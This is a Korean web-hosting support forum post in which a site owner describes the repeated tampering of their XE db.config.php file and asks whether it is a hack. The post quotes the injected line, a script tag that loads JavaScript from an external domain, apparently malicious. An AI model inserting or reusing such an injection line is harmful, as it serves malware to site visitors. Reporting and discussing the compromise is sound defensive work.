묻고답하기

  2. Support
  3. 묻고답하기

보안문제 때문에 질문드립니다.

2015.04.19 14:26

加藤恵

안녕하세요.

몇일 전부터 제가 운영하는 사이트가 한번씩 접속이 안되는 일이 있었습니다.

로그를 보니까 db.config.php 부분에 문제가 있다고 나와서 확인하니 파일 내용이 깨져 있었습니다.

그래서 백업해둔 파일로 대체해서 올리는 형식으로 해결했습니다.

하지만어째서 한번씩 파일이 깨지는건지에 대한 이유는 전혀 모르는 상태였습니다.

문제는 오늘도 그런 상황이 생겨서 바로 db.config.php를 교체하려고 했는데

이번에는 기본 내용의 마지막줄에 특정 스크립트를 불러오는 코드가 포함되어 있는것을 확인했습니다.

 

  'sitelock_message' => 'Maintenance in progress...'
);
<script src="http://shoestring.co.kr/xxe/dd/12.js"></script>

 

이런식으로 코드가 db.config.php에 포함되어 있었습니다.

저런식으로 수정되면 당연히 사이트 접속이 안되니까 바로 발견했습니다.

저 주소로 들어가보니 어베스트 백신이 막는것으로 봐서는 해킹과 관련이 있을거라고 생각됩니다..

다만 원인을 모르겠는 부분은 전 22번 포트를 방화벽으로 막아놨고 로그를 확인해보니 root 계정을 포함해서 저 이외에 로그인한 기록이 없습니다.

방화벽도 설정이 되어있고 sshd에서도 제 IP만을 허용해둔 상태입니다. 아마 기본적인 보안설정은 해둔거라고 생각합니다.

만약 가능성이 있다면 방화벽 차단을 넘어서 접속을 했다는 부분이 되는데...

db.config.php를 수정한걸 보면 sftp혹은 ssh으로 접속한거라고 생각합니다.

이거 해킹시도라고 볼 수 있는 부분인가요?

근데 방화벽을 넘어서 오는 해킹이라니 도저히 막을 방법이 생각나지 않네요..

일단 패스워드는 전부 더 복잡해서 변경은 해놨는데 걱정입니다

 

이 게시물을
좋아요
목록
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
-은지꼬- 갤러리 태그에 관련된 질문입니다 [2] 2007.08.10
기다림 form 에서 입력 못하게 하는 방법좀.. [2] 2007.08.10
정호석 스크롤 색상 관련 질문이요.ㅠ.ㅠ <수정..> [1] 2007.08.10
이병희 [re] 홈페이지 첫 화면에 게시판 최근 내용 올리는 방법 [1] 2007.08.10
이병희 홈페이지 첫 화면에 게시판 최근 내용 올리는 방법 [1] 2007.08.10
『PokerFace』™ 레이어 메뉴 만들기;;  
코코푸르나 최근게시물을 플래시 위로 오게 할 수 없나요?? [1] 2007.08.10
박종석 첫화면에 최근게시물 어떻게 올리나요?  
정호석 나모.. 아주 심각한 문젠데.. 질문이에요..ㅠㅠ [2] 2007.08.10
기다림 주민등록번호만 받고 성별이랑 생일 추출해내는 소스좀..  
기다림 XP 에서 텔넷이랑 ftp 하는 방법좀. [2] 2007.08.10
공유기시로! 아파치 서버에서 계정을 줄때 [4] 2007.08.10
정영훈 플래시 카운터에 대한 질문입니다. [1] 2007.08.10
신성규 제로보드의 아이콘... [2] 2007.08.10
라비 플래쉬MX에서 html 아이프레임처럼, php 인클루드처럼, [1] 2007.08.10
박선영 어디다 써야 할지... 컴퓨터에 오류가 있어서요. 고수분들! 알려주세요  
정윤진 sql에서 사용자랑 사용자 패스워드랑 어케 주나여...? [1] 2007.08.10
용신 [초보질문]포토샵7.0 에서 레이어 병합하는것좀........... [3] 2007.08.10
PΙΝΦΚΨΦ™ 멀티부팅으로 APM 같은 설정 사용하려면  
치토스 랜덤 이미지에 스크립트 걸기에서 질문드립니다;; [1] 2007.08.10
태그 쓰기